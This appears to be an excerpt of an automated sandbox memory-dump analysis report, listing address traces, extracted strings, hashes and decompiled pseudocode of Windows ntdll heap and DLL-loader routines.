0x04ab1cd1
0x04ab1cd8
0x04ab1cea
0x04ab1cea
0x04ab1cd8
0x04a6a2a9
0x04a6a2af
0x04a6a2bc
0x04ab1cfd
0x04a6a2c2
0x04a6a2c2
0x04a6a2c2
0x04a6a2c7
0x04ab1d07
0x04ab1d0d
0x04ab1d14
0x04ab1d1f
0x04ab1d21
0x04ab1d2c
0x04ab1d2c
0x04ab1d2c
0x04ab1d47
0x04ab1d47
0x04ab1d14
0x04a6a2cd
0x04a6a2d2
0x04a6a2d9
0x04ab1d5a
0x04a6a2df
0x04a6a2df
0x04a6a2df
0x04a6a2e4
0x04ab1d69
0x04ab1d6b
0x04ab1d76
0x04ab1d76
0x04ab1d76
0x04ab1d91
0x04ab1d91
0x04a6a2ea
0x04a6a2f0
0x04a6a2f5
0x04ab1da8
0x04ab1dad
0x04ab1dad
0x04a6a2fd
0x04a6a300
0x00000000

Strings

`, xrefs: 04AB1C8D
HEAP: , xrefs: 04AB1DE4
HEAP[%wZ]: , xrefs: 04AB1DD7
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 04AB1DF9

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 0-2586055223
Opcode ID: b88d0570b6b22c4c6e64b806dccafdfb80735a0306a6c593a7361d858c76ce08
Instruction ID: 08c5e8238c0f2883241006972a05905fd39b134bd13083b7e9d0f037d8bf5c32
Opcode Fuzzy Hash: b88d0570b6b22c4c6e64b806dccafdfb80735a0306a6c593a7361d858c76ce08
Instruction Fuzzy Hash: 5C5116313456809FE722DF68C954F6777F8FB85B94F040468F5969B292E725F800CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A78E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E04A78E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x4b3d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x4b38464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x4b35780 & 0x00000003) != 0) {
							E04AC5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x4b35780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E04A8B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x4b37984; // 0xdc2c58
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x4b38464; // 0x73b80110
					 *0x4b3b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E04A79B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x4b35780 & 0x00000005) != 0) {
						_push(_t49);
						E04AC5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x04a78e0f
0x04a78e16
0x04a78e19
0x04a78e1b
0x04a78e21
0x04a78e7f
0x04a78e85
0x04ab9354
0x04ab936c
0x04ab9371
0x04ab937b
0x04ab9381
0x04ab9381
0x04ab937b
0x04a78e9d
0x04a78e9d
0x04a78e29
0x04a78e2c
0x04a78e38
0x04a78e3e
0x04a78e43
0x04a78eb5
0x04a78eb9
0x04ab92aa
0x04ab92af
0x04ab92e8
0x04ab92e8
0x04ab92af
0x04a78eb9
0x04a78e45
0x04a78e53
0x04a78e5b
0x04a78e5f
0x04a78e78
0x04a78e78
0x04a78e7d
0x04a78ec3
0x04a78ecd
0x04a78ed2
0x04a78ed2
0x04a78ec5
0x04a78ec5
0x00000000
0x04a78e7d
0x04a78e67
0x04a78ea4
0x04ab931a
0x00000000
0x00000000
0x04ab9320
0x04a78ea4
0x04a78e70
0x04ab9325
0x04ab9340
0x04ab9345
0x04ab9345
0x04a78e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 04AB932A
LdrpFindDllActivationContext, xrefs: 04AB9331, 04AB935D
minkernel\ntdll\ldrsnap.c, xrefs: 04AB933B, 04AB9367
Querying the active activation context failed with status 0x%08lx, xrefs: 04AB9357

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 965fd38058666c0d986c86efc6f3f0eefef61a5580bf62955598e3d17441b9ca
Instruction ID: 3d0604852d9a67da7047618eb7247af6a5b54734b0ede9b3f015ec35ad53d595
Opcode Fuzzy Hash: 965fd38058666c0d986c86efc6f3f0eefef61a5580bf62955598e3d17441b9ca
Instruction Fuzzy Hash: 0741D232B00315AFDB35BB188C8DABAB3B8BB04744F09416EE84897551E778FD808691

Uniqueness

Uniqueness Score: -1.00%

Function 04B049A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

This is located in the %s field of the heap header., xrefs: 04B04AD6
HEAP[%wZ]: , xrefs: 04B04A3D, 04B04AB7
HEAP: , xrefs: 04B04A4A, 04B04A5D, 04B04A5F, 04B04AC4
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 04B04A61

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-336120773
Opcode ID: 39ba5e2ef1ed0ea46a745c5749af487a6397f7d028ecc786fa822abb5a7cc27d
Instruction ID: 4667b21c1b9c88353329686f41b021516f53dde9a33a5bad44954438a95e40e9
Opcode Fuzzy Hash: 39ba5e2ef1ed0ea46a745c5749af487a6397f7d028ecc786fa822abb5a7cc27d
Instruction Fuzzy Hash: 0431F235201510FFE721DF6CCA85F6B77A8EF44726F148095F6068B290E671F841DA68

Uniqueness

Uniqueness Score: -1.00%

Function 04A699BF, Relevance: 4.3, Strings: 3, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E04A699BF(void* __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				void* _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E04AFFA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E04B0A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E04A9D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E04A4B150();
										} else {
											E04A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E04A4B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x4b36378 = 1;
											asm("int3");
											 *0x4b36378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E04A6A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								L04A6A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E04A6BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E04B0A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E04A6A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								L04A6A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E04A9D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E04A4B150();
								} else {
									E04A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E04A4B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x4b36378 = 1;
									asm("int3");
									 *0x4b36378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E04AFFA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E04B0A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E04A9D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E04A4B150();
													} else {
														E04A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E04A4B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x4b36378 = 1;
														asm("int3");
														 *0x4b36378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E04A6A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										L04A6A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E04A6BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E04B0A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E04A9D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E04A4B150();
													} else {
														E04A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E04A4B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x4b36378 = 1;
														asm("int3");
														 *0x4b36378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E04A6A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										L04A6A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E04A6BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E04A6BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}

0x04a699ca
0x04a699cc
0x04a699df
0x04a699e3
0x04a699f8
0x04a699fb
0x04a699fb
0x00000000
0x04a69a48
0x04a69a48
0x04a69a4c
0x04a69a51
0x04a69a55
0x04a69a61
0x04a69a66
0x04a69a68
0x04ab1457
0x04ab145c
0x04ab145c
0x04a69a68
0x04a69a6e
0x04a69a71
0x04a69a74
0x04a69a76
0x04ab1466
0x04ab1469
0x04ab1469
0x04ab146c
0x04ab146e
0x04ab1471
0x04ab1474
0x04ab1477
0x04ab1479
0x04ab159c
0x04ab159c
0x04ab159d
0x04ab15a6
0x04ab15ab
0x04ab15ab
0x00000000
0x04ab15ab
0x04ab147f
0x04ab1481
0x00000000
0x00000000
0x04ab148a
0x04ab148d
0x04ab1493
0x04ab1495
0x04ab14c0
0x04ab14c0
0x04ab14c3
0x04ab14c6
0x04ab14c8
0x04ab14cb
0x04ab14cf
0x04ab14f2
0x04ab14f2
0x04ab14f5
0x04ab14f8
0x04ab1501
0x04ab1508
0x04ab150b
0x04ab150e
0x04ab1510
0x04ab1513
0x04ab1515
0x04ab1515
0x04ab1518
0x04ab1518
0x04ab1513
0x04ab1521
0x04ab1525
0x04ab152a
0x04ab152d
0x04ab1530
0x04ab1532
0x04ab1539
0x04ab153d
0x04ab155d
0x04ab1562
0x04ab153f
0x04ab1555
0x04ab155a
0x04ab1570
0x04ab1577
0x04ab157c
0x04ab1582
0x04ab1585
0x04ab1589
0x04ab158b
0x04ab1592
0x04ab1593
0x04ab1593
0x04ab1589
0x04ab1530
0x00000000
0x04ab14f8
0x04ab14d5
0x04ab14da
0x04ab14dc
0x00000000
0x04ab14de
0x04ab14e8
0x00000000
0x04ab14e8
0x04ab1497
0x04ab1497
0x04ab14a4
0x04ab14a4
0x04ab14a7
0x04ab14a9
0x04ab14ab
0x04ab14ab
0x04ab149c
0x04ab149e
0x04ab14a0
0x04ab14b0
0x04ab14b0
0x00000000
0x04ab14a2
0x04ab14a2
0x00000000
0x04ab14a2
0x04ab14a0
0x04ab14b3
0x04ab14bb
0x00000000
0x04ab14bb
0x04ab1495
0x04a69a7c
0x04a69a7c
0x04a69a7f
0x04a69a7f
0x04a69a82
0x04a69a84
0x04a69a87
0x04a69a8a
0x04a69a8d
0x04a69a8f
0x04ab166a
0x04ab166a
0x04ab166b
0x04ab1674
0x00000000
0x04ab1674
0x04a69a95
0x04a69a97
0x00000000
0x00000000
0x04a69aa0
0x04a69aa3
0x04a69aa9
0x04a69aab
0x04a69ad7
0x04a69ad7
0x04a69ada
0x04a69add
0x04a69adf
0x04a69ae2
0x04a69ae6
0x04a69b22
0x04a69b27
0x04a69b29
0x00000000
0x04a69b2b
0x04ab15be
0x00000000
0x04ab15be
0x04a69b29
0x04a69ae8
0x04a69ae8
0x04a69aeb
0x04a69aee
0x04ab15cb
0x04ab15d2
0x04ab15d5
0x04ab15d7
0x04ab15da
0x04ab15dc
0x04ab15dc
0x04ab15dc
0x04ab15da
0x04ab15e5
0x04ab15e9
0x04ab15ee
0x04ab15f1
0x04ab15f3
0x04ab15f9
0x04ab1600
0x04ab1604
0x04ab1624
0x04ab1629
0x04ab1606
0x04ab161c
0x04ab1621
0x04ab1637
0x04ab163e
0x04ab1643
0x04ab1649
0x04ab164c
0x04ab1650
0x04ab1656
0x04ab165d
0x04ab165e
0x04ab165e
0x04ab1650
0x04ab15f3
0x04a69af4
0x04a69af7
0x04a69afc
0x04a69b00
0x04a69b04
0x04a69b08
0x04a69b14
0x04a699fe
0x04a69a04
0x04a69a07
0x00000000
0x04a69a29
0x04ab169c
0x04ab16a0
0x04ab16a5
0x04ab16a9
0x04ab16b5
0x04ab16ba
0x04ab16bc
0x04ab16be
0x04ab16c3
0x04ab16c3
0x04ab16bc
0x04ab16c8
0x04ab16cc
0x04ab181b
0x04ab181b
0x04ab181e
0x04ab181e
0x04ab1821
0x04ab1823
0x04ab1826
0x04ab1829
0x04ab182c
0x04ab182e
0x04ab1688
0x04ab1688
0x04ab1689
0x04ab168b
0x04ab168c
0x04ab168d
0x04ab168f
0x04ab1692
0x00000000
0x04ab1692
0x04ab1834
0x04ab1836
0x00000000
0x00000000
0x04ab183f
0x04ab1842
0x04ab1848
0x04ab184a
0x04ab1875
0x04ab1875
0x04ab1878
0x04ab187b
0x04ab187d
0x04ab1880
0x04ab1884
0x04ab18a7
0x04ab18a7
0x04ab18aa
0x04ab18ad
0x04ab18b6
0x04ab18bd
0x04ab18c0
0x04ab18c3
0x04ab18c5
0x04ab18c8
0x04ab18ca
0x04ab18ca
0x04ab18cd
0x04ab18cd
0x04ab18c8
0x04ab18d5
0x04ab18da
0x04ab18df
0x04ab18e2
0x04ab18e5
0x04ab18e7
0x04ab18ee
0x04ab18f2
0x04ab1912
0x04ab1917
